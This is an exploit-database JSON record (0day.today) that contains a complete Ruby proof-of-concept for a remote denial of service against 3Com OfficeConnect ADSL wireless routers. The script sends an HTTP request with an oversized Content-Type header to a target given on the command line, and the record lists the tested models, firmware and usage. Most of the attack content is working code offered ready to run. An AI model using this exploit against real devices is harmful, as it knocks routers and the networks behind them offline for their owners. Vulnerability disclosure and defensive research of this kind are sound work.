Description
Exploit for unknown platform in category dos / poc
{"id": "1337DAY-ID-9804", "type": "zdt", "bulletinFamily": "exploit", "title": "3Com OfficeConnect Routers DoS (Content-Type)", "description": "Exploit for unknown platform in category dos / poc", "published": "2009-12-21T00:00:00", "modified": "2009-12-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/9804", "reporter": "Alberto Ortega", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-03T21:39:57", "viewCount": 10, "enchantments": {"score": {"value": -0.6, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.6}, "sourceHref": "https://0day.today/exploit/9804", "sourceData": "=============================================\r\n3Com OfficeConnect Routers DoS (Content-Type)\r\n=============================================\r\n\r\n# Title: 3Com OfficeConnect Routers DoS (Content-Type)\r\n# CVE-ID: ()\r\n# OSVDB-ID: ()\r\n# Author: Alberto Ortega\r\n# Published: 2009-12-21\r\n# Verified: no\r\n\r\nview source\r\nprint?\r\n###############\r\n# Model -> Tested on 3Com OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100A-72 and 3CRWDR100Y-72\r\n# Software Version -> Tested on 2.06T13 (Apr 2007, last version for these routers)\r\n# Attacker -> Tested from GNU/Linux (Sidux and Ubuntu) and Windows 7\r\n#\r\n# Exploit languaje -> Ruby\r\n# Type -> Remote Denial of Service Exploit by HTTP\r\n#\r\n# Additional info:\r\n# - The bug can be exploited with Tamper Data (Firefox Addon) too, LOL.\r\n#\r\n###############\r\n# Discovered and written by Alberto Ortega\r\n# http://pentbox.net/\r\n###############\r\n \r\nrequire \"socket\"\r\n \r\nhost = ARGV[0]\r\nbuffer = \"A\"\r\nsend = \"\"\r\n \r\nputs \"\"\r\nif !host\r\n puts \" 3Com OfficeConnect ADSL Wireless 11g Firewall Router\"\r\n puts \" Remote DoS Exploit by HTTP\"\r\n puts \" ------ Usage ---------------------------------------\"\r\n puts \" ruby 3com_dosexploit.rb host\"\r\n puts \" Ex: ruby 3com_dosexploit.rb 192.168.1.1\"\r\nelse\r\n begin\r\n socket = TCPSocket.new(host, 80)\r\n puts \"- Exploiting ...\"\r\n # 8.times is enough to DoS\r\n 9.times do\r\n buffer = \"#{buffer}#{buffer}\"\r\n end\r\n # Here are the HTTP packet, Content-Type value causes the DoS\r\n send = \"GET / HTTP/1.1\\r\\nContent-Type:#{buffer}\\r\\n\"\r\n socket.write(send)\r\n puts \"- Successfully! :)\"\r\n rescue\r\n puts \"Connection problem\"\r\n end\r\nend\r\nputs \"\"\r\n\r\n\r\n\n# 0day.today [2018-04-03] #", "_state": {"dependencies": 1647295439, "score": 1659766679}}
{}